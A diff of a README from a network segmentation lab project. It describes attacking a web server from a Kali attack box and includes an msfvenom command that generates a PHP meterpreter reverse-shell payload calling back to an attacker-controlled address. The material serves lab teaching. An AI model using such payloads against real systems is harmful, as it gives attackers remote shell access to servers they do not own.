LuisMateo1/Configuring-Network-Segmentation-and-Security/README.md

 In order to demonstrate how a server may make other hosts on the same segment vulnerable, I will run an attack against the web server.

-On a Kali VM, which I'll be using as the attack box (AB), I'll start msfconsole and run the following commands:
+On a Kali VM, which I'll be using as the attack box, I'll start msfconsole and run the following commands:

 1: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.192 lport=8080 -f raw > /root/get.php
 - Creates a reverse shell via PHP code